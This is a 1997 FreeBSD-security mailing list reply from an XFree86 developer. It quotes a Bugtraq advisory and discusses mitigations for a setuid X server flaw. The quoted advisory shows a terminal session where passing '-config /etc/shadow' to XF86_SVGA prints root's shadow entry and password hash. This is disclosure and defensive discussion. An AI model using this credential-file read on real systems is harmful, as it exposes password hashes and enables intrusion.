From owner-freebsd-security Sat Nov 22 00:25:20 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.7/8.8.7) id AAA22279 for security-outgoing; Sat, 22 Nov 1997 00:25:20 -0800 (PST) (envelope-from owner-freebsd-security) Received: from rf900.physics.usyd.edu.au (rf900.physics.usyd.edu.au [129.78.129.109]) by hub.freebsd.org (8.8.7/8.8.7) with ESMTP id AAA22272 for ; Sat, 22 Nov 1997 00:25:14 -0800 (PST) (envelope-from dawes@rf900.physics.usyd.edu.au) Received: (from dawes@localhost) by rf900.physics.usyd.edu.au (8.8.5/8.8.2) id TAA03724; Sat, 22 Nov 1997 19:24:54 +1100 (EST) Message-ID: <19971122192453.17451@rf900.physics.usyd.edu.au> Date: Sat, 22 Nov 1997 19:24:53 +1100 From: David Dawes To: Philippe Regnauld Cc: freebsd-security@FreeBSD.ORG Subject: Re: Fwd: "XFree86 insecurity" References: <19971122082350.56933@deepo.prosa.dk> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.69 In-Reply-To: <19971122082350.56933@deepo.prosa.dk>; from Philippe Regnauld on Sat, Nov 22, 1997 at 08:23:50AM +0100 Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Sat, Nov 22, 1997 at 08:23:50AM +0100, Philippe Regnauld wrote: We (XFree86) are aware of this one. I agree with the recomendation of removing the setuid bit and using xdm to start the Xserver, and if you have XFree86 on a machine where this problem is significant, you should consider doing this. The fix is to disable the '-config' Xserver option. This will be removed in our next release, and also in the next X11 release from The Open Group. It was only added to get around problems on OS's with small command line length limits, and should never have been enabled for most Unix-like OSs. The problem isn't XFree86-specific. It affects any platform using X11R6 XC/TOG code where the Xserver is installed setuid root (although on non-XFree86 platforms you may need to be a little more inventive with the use of the -config option). David >Cute one. > >-----Forwarded message from shegget ----- > >Date: Fri, 21 Nov 1997 18:35:36 +0000 >From: shegget >Subject: XFree86 insecurity >To: BUGTRAQ@NETSPACE.ORG > > plaguez security advisory n.10 > > XFree86 insecurity > > > > >Program: XF86_*, the XFree86 servers (XF86_SVGA, XF86_VGA16, ...) > >Version: Tested on XFree86 3.3.1 (current), 3.2.9 and 3.1.2. > Other versions as well. > >OS: All > >Impact: The XFree86 servers let you specify an alternate configuration > file and do not check whether you have rights to read it. > Any user can read files with root permissions. > > > > >hello, >just a short one to tell you about this "feature" I found in all default >XFree86 servers... > > >Here it is: > >Script started on Sat Aug 23 15:32:36 1997 >Loading /usr/lib/kbd/keytables/fr-latin1.map >[plaguez@plaguez plaguez]$ uname -a >Linux plaguez 2.0.31 #10 Wed Aug 20 04:24:38 MET DST 1997 i586 >[plaguez@plaguez plaguez]$ ls -al /etc/shadow >-rw------- 1 root bin 1039 Aug 21 20:12 /etc/shadow >[plaguez@plaguez bin]$ id >uid=502(plaguez) gid=500(users) groups=500(users) >[plaguez@plaguez plaguez]$ cd /usr/X11R6/bin >[plaguez@plaguez bin]$ ./XF86_SVGA -config /etc/shadow >Unrecognized option: root:qEXaUxSeQ45ls:10171:-1:-1:-1:-1:-1:-1 >use: X [:] [option] >-a # mouse acceleration (pixels) >-ac disable access control restrictions >-audit int set audit trail level >-auth file select authorization file >bc enable bug compatibility >-bs disable any backing store support >-c turns off key-click > >... and so on. HINT: look at the first XF86_SVGA output line. > > > > > >Patch: >------ > >If you run xdm, you should consider removing the setuid bit of the >servers. > >If not, well, wait for the XFree86 Project to bring you a patch, since I'm >too lazy to find and fix it. > > > > > >later, > >-plaguez >dube0866@eurobretagne.fr > >-----End of forwarded message----- > >-- > -- Phil > > -[ Philippe Regnauld / sysadmin / regnauld@deepo.prosa.dk / +55.4N +11.3E ]-